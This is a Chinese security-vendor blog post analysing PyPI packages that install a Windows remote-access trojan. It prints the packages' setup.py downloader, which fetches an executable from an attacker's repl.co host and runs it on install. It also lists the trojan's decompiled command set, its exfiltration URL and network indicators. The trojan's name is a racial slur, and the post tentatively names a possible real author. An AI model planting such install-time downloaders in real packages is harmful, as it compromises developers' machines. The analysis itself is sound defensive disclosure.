ihateniggers:针对Python开发者的Windows远控木马分析

背景

墨菲安全实验室在持续监测开源软件仓库中的投毒行为,5 月 9 日起发现 4 个包含 “ihateniggers” 远程控制木马的 Python 包被 nagogy@gmail.com 邮箱关联的账号发布到 PyPI 仓库,试图针对Windows系统下 Python 开发者进行攻击。木马利用了discord、replit、playit 等多个平台托管后门、隐藏身份,当前木马作者仍在活跃。

事件简述

我们监测发现,从 5 月 9 日开始在 PyPI 仓库出现利用 “ihateniggers” 木马进行攻击的后门组件(installpippython),这些包只针对 Windows 操作系统执行恶意逻辑。

这些投毒包通过在 setup.py 中添加下载执行下载器的逻辑,再通过下载器下载执行木马。下载器首先下载 curl 的 dll 文件为攻击做铺垫,之后下载 “ihateniggers” 木马文件并执行。该木马中存在截取屏幕、执行命令、下载文件、获取剪贴板、获取Wi-Fi密码等恶意行为。

当前投毒者仍在活跃,墨菲安全发现至少有 4 个包含 “ihateniggers” 木马文件的 Python 包,这些包当前在 PyPI 仓库中已被下线。

包名版本发布时间所用用户名所用邮箱
args-python12.4.52023/5/10nagogy213nagogy@gmail.com
args-python12.5.52023/5/10nagogy213nagogy@gmail.com
argspython12.5.52023/5/10nagogy213nagogy@gmail.com
argspython12.6.52023/5/10nagogy213nagogy@gmail.com
installpippython19.3.52023/5/9nagogy213nagogy@gmail.com
pythonarg1.12023/5/10dynastyoaknagogy@gmail.com

投毒者 dreamyoak 利用了 https://discord.com/、https://replit.com/、https://playit.gg/ 等平台托管其恶意文件、作为信息收集的后端服务、命令控制的信道,其母语可能是韩语/朝鲜语。

投毒行为分析

投放包含下载器的 Python 包

投毒者以 arg 作为关键词在 PyPI 仓库中发布了多个包,以 pythonarg v1.1 为例,当用户通过 pip 安装投毒组件包或者引入组件包的 reqinstaller 模块时,将会从 hxxps://cdn.dreamyoak.repl.co/ 下载并执行恶意软件:

# setup.py 和 reqinstaller模块中的 __init__.py
import urllib.request
import tempfile
import subprocess

url = 'https://cdn.dreamyoak.repl.co/cdn/hb2Voh.exe'
with urllib.request.urlopen(url) as response:
    with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
        tmp_file.write(response.read())
        exe_path = tmp_file.name

subprocess.call([exe_path])

exe文件运行时将从 hxxps://cdn.discordapp.com/ 下载libcurl以及木马windows-services.exe,这些文件被作为附件传到了Discord中。

ihateniggers:针对Python开发者的Windows远控木马分析

在文件中也可以提取到开发时的项目路径,将该模块称为rat-downloader

C:UsersadminDesktopdreamyoakprojectsc++rat-downloader

Replit提供了从代码编写到构建运行的云端IDE环境,*.repl.co是Replit平台提供用于托管用户项目的域名。

ihateniggers:针对Python开发者的Windows远控木马分析

投毒者至少使用了 “dreamyoak” 和 “thughunter” 两个账号,分别注册了 “cdn” 和 “cdn-1” 等多个项目,用于托管下载器,以及后续的信息收集服务。

ihateniggers:针对Python开发者的Windows远控木马分析
ihateniggers:针对Python开发者的Windows远控木马分析

通过下载器引入远控木马(RAT)

windows-services.exe 是一个功能全面的远程控制木马(RAT),运行依赖于 libcurl.dll 动态链接库。与hb2Voh.exe相同,都使用 MinGW 构建,投毒者可能更熟悉 Linux 下的开发环境。

在运行后会先通过注册表、fodhelper.exe 等绕过 UAC。

ihateniggers:针对Python开发者的Windows远控木马分析

而后连接back-effort.at.ply[.]gg:50555服务,ply.gg是playit.gg提供的游戏托管服务域名,针对游戏场景提供了TCP/UDP的公网端口中转服务。该木马利用playit.gg作为C2服务,降低成本,隐藏其身份。

ihateniggers:针对Python开发者的Windows远控木马分析
ihateniggers:针对Python开发者的Windows远控木马分析

木马中支持了大量的控制指令,实现了如截取屏幕、执行命令、下载文件、获取剪贴板、获取Wi-Fi密码等功能。

if ( (unsigned __int8)sub_522560(&v41, "!ip") )
if ( (unsigned __int8)sub_522560(&v41, "!screenshot") )
v12 = sub_522560(&STACK[0x7A0], "!download");
v14 = sub_522560(&STACK[0x870], "!cmd");
if ( (unsigned __int8)sub_522560(&v41, "!dir") )
if ( (unsigned __int8)sub_522560(&v41, "!clipboard") )
v15 = sub_522560(&STACK[0xBD0], "!openlink");
else if ( (unsigned __int8)sub_522560(&v41, "!wifipasswords") )
v16 = sub_522560(&STACK[0xCA0], "!errorbox");
else if ( (unsigned __int8)sub_522560(&v41, "!tasklist") )
v17 = sub_522560(&STACK[0xE40], "!run");
else if ( (unsigned __int8)sub_522560(&v41, "!lock") )
v18 = sub_522560(&STACK[0xF00], "!delete");
else if ( (unsigned __int8)sub_522560(&v41, "!getadmin") )
else if ( (unsigned __int8)sub_522560(&v41, "!webcam") )
v19 = sub_522560(&STACK[0x10E0], "!upload");
v20 = sub_522560(&STACK[0x1140], "!mic");
else if ( (unsigned __int8)sub_522560(&v41, "!disabledef") )
v22 = sub_522560(&STACK[0x12A0], "!cd");
else if ( (unsigned __int8)sub_522560(&v41, "!isadmin") )
v24 = sub_522560(&STACK[0x1370], "!wallpaper");
else if ( (unsigned __int8)sub_522560(&v41, "!restart") )
else if ( (unsigned __int8)sub_522560(&v41, "!shutdown") )
v29 = sub_522560(&STACK[0x14F0], "!uprun");
v30 = sub_522560(&STACK[0x15B0], "!kill");
else if ( (unsigned __int8)sub_522560(&v41, "!sysinfo") )
else if ( (unsigned __int8)sub_522560(&v41, "!fuckkeyboard") )
else if ( (unsigned __int8)sub_522560(&v41, "!fixkeyboard") )
else if ( (unsigned __int8)sub_522560(&v41, "!blackscreen") )
else if ( (unsigned __int8)sub_522560(&v41, "!bluescreen") )
else if ( (unsigned __int8)sub_522560(&v41, "!windowspass") )
v31 = sub_522560(&STACK[0x17C0], "!spam");
v33 = sub_522560(&STACK[0x1860], "!adduser");
v34 = sub_522560(&STACK[0x18D0], "!listusers");
v35 = sub_522560(&STACK[0x1910], "!deluser");
v36 = sub_522560(&STACK[0x1980], "!play");

也会依赖其他后门完成额外操作,如获取摄像头画面:

ihateniggers:针对Python开发者的Windows远控木马分析

获取敏感信息后留存的文件,多以 ihateniggers 作为前缀命名,投毒者可能是种族主义者(niggers 意为黑鬼)。

ihateniggers:针对Python开发者的Windows远控木马分析

窃取后的信息会发送至 replit 的信息收集服务中(hxxps://cdn.dreamyoak.repl.co/api/upload/nagogy133)

ihateniggers:针对Python开发者的Windows远控木马分析

溯源分析

投毒者在 2023 年 1 月份就开始用“@thughunter”账号进行服务部署,在Replit中部署了多套环境进行测试,在 5 月 10 号开始以“@dreamyoak”发布除 installpippython 之外的其他投毒包。

在GitHub中,dreamyoak、nagogy账号与木马作者的关联性较高,其仓库中也包含类似功能的恶意软件代码。

ihateniggers:针对Python开发者的Windows远控木马分析
ihateniggers:针对Python开发者的Windows远控木马分析

通过邮箱关联,攻击者可能使用韩语/朝鲜语作为其母语,其对应名称可能为김기원(金基元)。

ihateniggers:针对Python开发者的Windows远控木马分析

风险防范

当前,PyPI仓库中涉及的python包已经下线,gplayit中的back-effort.at.ply[.]gg:50555服务已经关闭,replit中thughunter的服务未开启。但从其投毒行为来看,还处于早期调试阶段,后续可能持续投毒并提升检测对抗难度。

相关网络IOC包括:

back-effort.at.ply[.]gg:50555
hxxps://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll
hxxps://cdn.discordapp.com/attachments/1055888135671795823/1105562608993570816/win32.exe
hxxps://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe
hxxps://cdn.dreamyoak.repl.co/cdn/hb2Voh.exe
hxxps://cdn.dreamyoak.repl.co/api/upload/nagogy1337
hxxps://cdn-1.thughunter.repl.co/cdn/DLwsT3.exe
hxxps://cdn-1.thughunter.repl.co/cdn/Windows.exe

发布者:墨菲安全,转发请注明出处:https://www.murphysec.com/blog/poisoning-analysis/4853.html

(0)
上一篇 2023年3月2日 10:56
下一篇 2023年5月12日 18:30

相关推荐

  • 多个不同名称的 PyPI 包中发现 W4SP 窃取器

    威胁参与者已经向 Python 包索引(PyPI)发布了另一轮恶意软件包,目的是在受到威胁的开发人员机器上发布窃取信息的恶意软件。 有趣的是,尽管这个恶意软件有很多名字,比如ANGEL Stealer,Celestial Stealer,Fade Stealer,Leaf $tealer,PURE Stealer,Satan Stealer和@skid St…

    2023年2月17日
  • 开源无国界?vue-cli、node-ipc被投毒事件分析

    开源无国界?vue-cli、node-ipc被投毒事件分析 简述 近日我们监测到Vue.js生态中的vue-cli包遭遇供应链投毒,而被投毒的node-ipc包在npm上每周下载量超百万,影响非常广泛。 被投毒的情况如下: (问题组件每周下载量截图) 事件时间线 3月7号 开发者RIAEvangelist在node-ipc包中添加名为ssl-geospec….

    2023年1月4日
  • btwiuse在 NPM 仓库中发布后门组件

    事件简述 NPM 是 Node.js 包管理工具,提供了对第三方 Node.js 包的查找、下载、安装、卸载等功能。 2022 年 07 月 04 日,OSCS 监测发现 NPM 官方仓库被 btwiuse 上传了 btwiuse、k0s 恶意组件包,使用恶意组件包后会在用户电脑上加载名为 k0s 的远控木马,危害较为严重,OSCS 提醒广大开发者关注。 详…

    2023年1月5日
  • 二月最新漏洞列表

    Apache IoTDB-Workbench <0.13.3 存在身份验证绕过漏洞(CVE-2023-24829),Apache Linkis <1.3.1 任意客户端文件读取漏洞(CVE-2022-44644),Apache Linkis <1.3.1 存在反序列化漏洞(CVE-2022-44645),Apache InLong 存在任意文件读取漏洞(CVE-2023-24977)

    2023年2月6日
  • 在线编程 IDE =远程网络攻击?

    背景: 黑客通常使用受感染的机器而不是直接从个人拥有的设备发起攻击,这使他们能够隐藏其来源。在最近的事件响应中,Profero 的事件响应团队调查了一种可能的情况,假设威胁参与者使用 Datacamp 的在线 IDE 对云基础设施发起攻击。但是,因为Datacamp、ISP 和在线 IDE 之间错综复杂的关系,使得Profero 的事件响应团队对使用云 ID…

    2023年1月5日

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

联系我们

400-180-9568

邮件:hi@murphysec.com

工作时间:周一至周五,10:00-19:00,节假日休息

关注公众号

20230105-100741